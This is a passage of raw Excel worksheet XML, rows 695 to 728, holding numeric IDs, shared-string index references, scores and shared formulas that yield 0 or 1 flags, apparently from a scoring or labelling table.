        <v>86</v>
      </c>
      <c r="C695" s="63" t="s">
        <v>2275</v>
      </c>
      <c r="D695" s="62" t="s">
        <v>2276</v>
      </c>
      <c r="E695" s="62" t="s">
        <v>2277</v>
      </c>
      <c r="F695" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G695" s="62">
        <v>0.9</v>
      </c>
      <c r="H695" s="64">
        <v>1.0</v>
      </c>
      <c r="I695" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J695" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K695" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L695" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O695" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="62">
        <v>156.0</v>
      </c>
      <c r="B696" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C696" s="63" t="s">
        <v>2278</v>
      </c>
      <c r="D696" s="62" t="s">
        <v>2279</v>
      </c>
      <c r="E696" s="62" t="s">
        <v>2280</v>
      </c>
      <c r="F696" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G696" s="62">
        <v>0.9</v>
      </c>
      <c r="H696" s="64">
        <v>1.0</v>
      </c>
      <c r="I696" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J696" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K696" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L696" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O696" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="62">
        <v>177.0</v>
      </c>
      <c r="B697" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C697" s="63" t="s">
        <v>2281</v>
      </c>
      <c r="D697" s="62" t="s">
        <v>2282</v>
      </c>
      <c r="E697" s="62" t="s">
        <v>2283</v>
      </c>
      <c r="F697" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G697" s="62">
        <v>0.9</v>
      </c>
      <c r="H697" s="64">
        <v>1.0</v>
      </c>
      <c r="I697" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J697" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K697" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L697" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O697" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="62">
        <v>179.0</v>
      </c>
      <c r="B698" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C698" s="63" t="s">
        <v>2284</v>
      </c>
      <c r="D698" s="62" t="s">
        <v>2285</v>
      </c>
      <c r="E698" s="62" t="s">
        <v>2286</v>
      </c>
      <c r="F698" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G698" s="62">
        <v>0.85</v>
      </c>
      <c r="H698" s="64">
        <v>1.0</v>
      </c>
      <c r="I698" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J698" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K698" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L698" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O698" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="62">
        <v>184.0</v>
      </c>
      <c r="B699" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C699" s="63" t="s">
        <v>2287</v>
      </c>
      <c r="D699" s="62" t="s">
        <v>2288</v>
      </c>
      <c r="E699" s="62" t="s">
        <v>2289</v>
      </c>
      <c r="F699" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G699" s="62">
        <v>0.9</v>
      </c>
      <c r="H699" s="64">
        <v>1.0</v>
      </c>
      <c r="I699" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J699" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K699" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L699" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O699" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="62">
        <v>199.0</v>
      </c>
      <c r="B700" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C700" s="63" t="s">
        <v>2290</v>
      </c>
      <c r="D700" s="62" t="s">
        <v>2291</v>
      </c>
      <c r="E700" s="62" t="s">
        <v>2292</v>
      </c>
      <c r="F700" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G700" s="62">
        <v>0.9</v>
      </c>
      <c r="H700" s="64">
        <v>1.0</v>
      </c>
      <c r="I700" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J700" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K700" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L700" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O700" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="62">
        <v>201.0</v>
      </c>
      <c r="B701" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C701" s="63" t="s">
        <v>2293</v>
      </c>
      <c r="D701" s="62" t="s">
        <v>2294</v>
      </c>
      <c r="E701" s="62" t="s">
        <v>2295</v>
      </c>
      <c r="F701" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G701" s="62">
        <v>0.85</v>
      </c>
      <c r="H701" s="64">
        <v>1.0</v>
      </c>
      <c r="I701" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J701" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K701" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L701" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O701" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="62">
        <v>202.0</v>
      </c>
      <c r="B702" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C702" s="63" t="s">
        <v>2296</v>
      </c>
      <c r="D702" s="62" t="s">
        <v>2297</v>
      </c>
      <c r="E702" s="62" t="s">
        <v>2298</v>
      </c>
      <c r="F702" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G702" s="62">
        <v>0.9</v>
      </c>
      <c r="H702" s="64">
        <v>1.0</v>
      </c>
      <c r="I702" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J702" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K702" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L702" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O702" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="62">
        <v>209.0</v>
      </c>
      <c r="B703" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C703" s="63" t="s">
        <v>2299</v>
      </c>
      <c r="D703" s="62" t="s">
        <v>2300</v>
      </c>
      <c r="E703" s="62" t="s">
        <v>2301</v>
      </c>
      <c r="F703" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G703" s="62">
        <v>0.9</v>
      </c>
      <c r="H703" s="64">
        <v>1.0</v>
      </c>
      <c r="I703" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J703" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K703" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L703" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O703" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="62">
        <v>221.0</v>
      </c>
      <c r="B704" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C704" s="63" t="s">
        <v>2302</v>
      </c>
      <c r="D704" s="62" t="s">
        <v>2303</v>
      </c>
      <c r="E704" s="62" t="s">
        <v>2304</v>
      </c>
      <c r="F704" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G704" s="62">
        <v>0.85</v>
      </c>
      <c r="H704" s="64">
        <v>1.0</v>
      </c>
      <c r="I704" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J704" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K704" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L704" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O704" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="62">
        <v>226.0</v>
      </c>
      <c r="B705" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C705" s="63" t="s">
        <v>2305</v>
      </c>
      <c r="D705" s="62" t="s">
        <v>2306</v>
      </c>
      <c r="E705" s="62" t="s">
        <v>2307</v>
      </c>
      <c r="F705" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G705" s="62">
        <v>0.9</v>
      </c>
      <c r="H705" s="64">
        <v>1.0</v>
      </c>
      <c r="I705" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J705" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K705" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L705" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O705" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="62">
        <v>235.0</v>
      </c>
      <c r="B706" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C706" s="63" t="s">
        <v>2308</v>
      </c>
      <c r="D706" s="62" t="s">
        <v>2309</v>
      </c>
      <c r="E706" s="62" t="s">
        <v>2310</v>
      </c>
      <c r="F706" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G706" s="62">
        <v>0.9</v>
      </c>
      <c r="H706" s="64">
        <v>1.0</v>
      </c>
      <c r="I706" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J706" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K706" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L706" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O706" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="62">
        <v>237.0</v>
      </c>
      <c r="B707" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C707" s="63" t="s">
        <v>2311</v>
      </c>
      <c r="D707" s="62" t="s">
        <v>2312</v>
      </c>
      <c r="E707" s="62" t="s">
        <v>2313</v>
      </c>
      <c r="F707" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G707" s="62">
        <v>0.9</v>
      </c>
      <c r="H707" s="64">
        <v>1.0</v>
      </c>
      <c r="I707" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J707" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K707" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L707" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O707" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="62">
        <v>249.0</v>
      </c>
      <c r="B708" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C708" s="63" t="s">
        <v>2314</v>
      </c>
      <c r="D708" s="62" t="s">
        <v>2315</v>
      </c>
      <c r="E708" s="62" t="s">
        <v>2316</v>
      </c>
      <c r="F708" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G708" s="62">
        <v>0.7</v>
      </c>
      <c r="H708" s="64">
        <v>1.0</v>
      </c>
      <c r="I708" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J708" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K708" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L708" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O708" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="62">
        <v>16.0</v>
      </c>
      <c r="B709" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C709" s="63" t="s">
        <v>2317</v>
      </c>
      <c r="D709" s="62" t="s">
        <v>2318</v>
      </c>
      <c r="E709" s="62" t="s">
        <v>2319</v>
      </c>
      <c r="F709" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G709" s="62">
        <v>0.9</v>
      </c>
      <c r="H709" s="64">
        <v>1.0</v>
      </c>
      <c r="I709" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J709" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K709" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L709" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O709" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="62">
        <v>26.0</v>
      </c>
      <c r="B710" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C710" s="63" t="s">
        <v>2320</v>
      </c>
      <c r="D710" s="62" t="s">
        <v>2321</v>
      </c>
      <c r="E710" s="62" t="s">
        <v>2322</v>
      </c>
      <c r="F710" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G710" s="62">
        <v>0.85</v>
      </c>
      <c r="H710" s="64">
        <v>1.0</v>
      </c>
      <c r="I710" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J710" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K710" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L710" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O710" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="62">
        <v>37.0</v>
      </c>
      <c r="B711" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C711" s="63" t="s">
        <v>2323</v>
      </c>
      <c r="D711" s="62" t="s">
        <v>2324</v>
      </c>
      <c r="E711" s="62" t="s">
        <v>2325</v>
      </c>
      <c r="F711" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G711" s="62">
        <v>0.9</v>
      </c>
      <c r="H711" s="64">
        <v>1.0</v>
      </c>
      <c r="I711" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J711" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K711" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L711" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O711" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="62">
        <v>82.0</v>
      </c>
      <c r="B712" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C712" s="63" t="s">
        <v>2326</v>
      </c>
      <c r="D712" s="62" t="s">
        <v>2327</v>
      </c>
      <c r="E712" s="62" t="s">
        <v>2328</v>
      </c>
      <c r="F712" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G712" s="62">
        <v>0.85</v>
      </c>
      <c r="H712" s="64">
        <v>1.0</v>
      </c>
      <c r="I712" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J712" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K712" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L712" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O712" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="62">
        <v>93.0</v>
      </c>
      <c r="B713" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C713" s="63" t="s">
        <v>2329</v>
      </c>
      <c r="D713" s="62" t="s">
        <v>2330</v>
      </c>
      <c r="E713" s="62" t="s">
        <v>2331</v>
      </c>
      <c r="F713" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G713" s="62">
        <v>0.85</v>
      </c>
      <c r="H713" s="64">
        <v>1.0</v>
      </c>
      <c r="I713" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J713" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K713" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L713" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O713" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="62">
        <v>166.0</v>
      </c>
      <c r="B714" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C714" s="63" t="s">
        <v>2332</v>
      </c>
      <c r="D714" s="62" t="s">
        <v>2333</v>
      </c>
      <c r="E714" s="62" t="s">
        <v>2334</v>
      </c>
      <c r="F714" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G714" s="62">
        <v>0.9</v>
      </c>
      <c r="H714" s="64">
        <v>1.0</v>
      </c>
      <c r="I714" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J714" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K714" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L714" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O714" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="62">
        <v>214.0</v>
      </c>
      <c r="B715" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C715" s="63" t="s">
        <v>2335</v>
      </c>
      <c r="D715" s="62" t="s">
        <v>2336</v>
      </c>
      <c r="E715" s="62" t="s">
        <v>2337</v>
      </c>
      <c r="F715" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G715" s="62">
        <v>0.85</v>
      </c>
      <c r="H715" s="64">
        <v>1.0</v>
      </c>
      <c r="I715" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J715" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K715" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L715" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O715" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="62">
        <v>409.0</v>
      </c>
      <c r="B716" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C716" s="63" t="s">
        <v>2338</v>
      </c>
      <c r="D716" s="62" t="s">
        <v>2339</v>
      </c>
      <c r="E716" s="62" t="s">
        <v>2340</v>
      </c>
      <c r="F716" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G716" s="62">
        <v>0.95</v>
      </c>
      <c r="H716" s="64">
        <v>1.0</v>
      </c>
      <c r="I716" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J716" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K716" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L716" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O716" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="62">
        <v>524.0</v>
      </c>
      <c r="B717" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C717" s="63" t="s">
        <v>2341</v>
      </c>
      <c r="D717" s="62" t="s">
        <v>2342</v>
      </c>
      <c r="E717" s="62" t="s">
        <v>2343</v>
      </c>
      <c r="F717" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G717" s="62">
        <v>0.9</v>
      </c>
      <c r="H717" s="64">
        <v>0.0</v>
      </c>
      <c r="I717" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J717" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K717" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L717" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O717" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="62">
        <v>543.0</v>
      </c>
      <c r="B718" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C718" s="63" t="s">
        <v>2344</v>
      </c>
      <c r="D718" s="62" t="s">
        <v>2345</v>
      </c>
      <c r="E718" s="62" t="s">
        <v>2346</v>
      </c>
      <c r="F718" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G718" s="62">
        <v>0.9</v>
      </c>
      <c r="H718" s="64">
        <v>1.0</v>
      </c>
      <c r="I718" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J718" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K718" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L718" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O718" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="62">
        <v>568.0</v>
      </c>
      <c r="B719" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C719" s="63" t="s">
        <v>2347</v>
      </c>
      <c r="D719" s="62" t="s">
        <v>2348</v>
      </c>
      <c r="E719" s="62" t="s">
        <v>2349</v>
      </c>
      <c r="F719" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G719" s="62">
        <v>0.9</v>
      </c>
      <c r="H719" s="64">
        <v>1.0</v>
      </c>
      <c r="I719" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J719" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K719" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L719" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O719" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="62">
        <v>814.0</v>
      </c>
      <c r="B720" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C720" s="63" t="s">
        <v>2350</v>
      </c>
      <c r="D720" s="62" t="s">
        <v>2351</v>
      </c>
      <c r="E720" s="62" t="s">
        <v>2352</v>
      </c>
      <c r="F720" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G720" s="62">
        <v>0.9</v>
      </c>
      <c r="H720" s="64">
        <v>0.0</v>
      </c>
      <c r="I720" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J720" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K720" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L720" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O720" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="62">
        <v>861.0</v>
      </c>
      <c r="B721" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C721" s="63" t="s">
        <v>2353</v>
      </c>
      <c r="D721" s="62" t="s">
        <v>2354</v>
      </c>
      <c r="E721" s="62" t="s">
        <v>2355</v>
      </c>
      <c r="F721" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G721" s="62">
        <v>0.9</v>
      </c>
      <c r="H721" s="64">
        <v>1.0</v>
      </c>
      <c r="I721" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J721" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K721" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L721" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O721" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="62">
        <v>913.0</v>
      </c>
      <c r="B722" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C722" s="63" t="s">
        <v>2356</v>
      </c>
      <c r="D722" s="62" t="s">
        <v>2357</v>
      </c>
      <c r="E722" s="62" t="s">
        <v>2358</v>
      </c>
      <c r="F722" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G722" s="62">
        <v>0.9</v>
      </c>
      <c r="H722" s="64">
        <v>1.0</v>
      </c>
      <c r="I722" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J722" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K722" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L722" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O722" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="62">
        <v>1036.0</v>
      </c>
      <c r="B723" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C723" s="63" t="s">
        <v>2359</v>
      </c>
      <c r="D723" s="62" t="s">
        <v>2360</v>
      </c>
      <c r="E723" s="62" t="s">
        <v>2361</v>
      </c>
      <c r="F723" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G723" s="62">
        <v>0.95</v>
      </c>
      <c r="H723" s="64">
        <v>1.0</v>
      </c>
      <c r="I723" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J723" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K723" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L723" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O723" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="62">
        <v>1064.0</v>
      </c>
      <c r="B724" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C724" s="63" t="s">
        <v>2362</v>
      </c>
      <c r="D724" s="62" t="s">
        <v>2363</v>
      </c>
      <c r="E724" s="62" t="s">
        <v>2364</v>
      </c>
      <c r="F724" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G724" s="62">
        <v>0.95</v>
      </c>
      <c r="H724" s="64">
        <v>1.0</v>
      </c>
      <c r="I724" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J724" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K724" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L724" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O724" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="62">
        <v>1160.0</v>
      </c>
      <c r="B725" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C725" s="63" t="s">
        <v>2365</v>
      </c>
      <c r="D725" s="62" t="s">
        <v>2366</v>
      </c>
      <c r="E725" s="62" t="s">
        <v>2367</v>
      </c>
      <c r="F725" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G725" s="62">
        <v>0.95</v>
      </c>
      <c r="H725" s="64">
        <v>1.0</v>
      </c>
      <c r="I725" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J725" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K725" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L725" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O725" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="62">
        <v>1161.0</v>
      </c>
      <c r="B726" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C726" s="63" t="s">
        <v>2368</v>
      </c>
      <c r="D726" s="62" t="s">
        <v>2369</v>
      </c>
      <c r="E726" s="62" t="s">
        <v>2370</v>
      </c>
      <c r="F726" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G726" s="62">
        <v>0.9</v>
      </c>
      <c r="H726" s="64" t="s">
        <v>135</v>
      </c>
      <c r="I726" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J726" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K726" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L726" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O726" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="62">
        <v>1239.0</v>
      </c>
      <c r="B727" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C727" s="63" t="s">
        <v>2371</v>
      </c>
      <c r="D727" s="62" t="s">
        <v>2372</v>
      </c>
      <c r="E727" s="62" t="s">
        <v>2373</v>
      </c>
      <c r="F727" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G727" s="62">
        <v>0.9</v>
      </c>
      <c r="H727" s="64">
        <v>1.0</v>
      </c>
      <c r="I727" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J727" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K727" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L727" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O727" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="62">
        <v>1436.0</v>
      </c>
      <c r="B728" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C728" s="63" t="s">
        <v>2374</v>
      </c>
      <c r="D728" s="62" t="s">
        <v>2375</v>
      </c>
      <c r="E728" s="62" t="s">
        <v>2376</v>
      </c>
      <c r="F728" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G728" s="62">
        <v>0.85</v>
      </c>
      <c r="H728" s="64">
        <v>1.0</v>
      </c>
      <c r="I728" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J728" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K728" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L728" s="65">
